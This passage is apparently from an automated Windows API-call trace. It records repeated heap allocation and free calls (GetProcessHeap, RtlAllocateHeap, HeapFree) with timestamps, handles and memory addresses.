(HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.984] GetProcessHeap () returned 0xe30000 [0140.984] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.984] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.985] GetProcessHeap () returned 0xe30000 [0140.985] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0140.985] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.986] GetProcessHeap () returned 0xe30000 [0140.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.986] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0140.987] GetProcessHeap () returned 0xe30000 [0140.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.988] GetProcessHeap () returned 0xe30000 [0140.988] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.990] GetProcessHeap () returned 0xe30000 [0140.990] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0140.990] GetProcessHeap () returned 0xe30000 [0140.990] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0140.990] GetProcessHeap () returned 0xe30000 [0140.990] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.990] GetProcessHeap () returned 0xe30000 [0140.990] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.990] GetProcessHeap () returned 0xe30000 [0140.990] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.990] GetProcessHeap () returned 0xe30000 [0140.990] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.990] GetProcessHeap () returned 0xe30000 [0140.990] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.990] GetProcessHeap () returned 0xe30000 [0140.990] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0140.991] GetProcessHeap () returned 0xe30000 [0140.991] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.992] GetProcessHeap () returned 0xe30000 [0140.992] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.992] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.993] GetProcessHeap () returned 0xe30000 [0140.993] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.993] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0140.994] GetProcessHeap () returned 0xe30000 [0140.994] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0140.994] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, 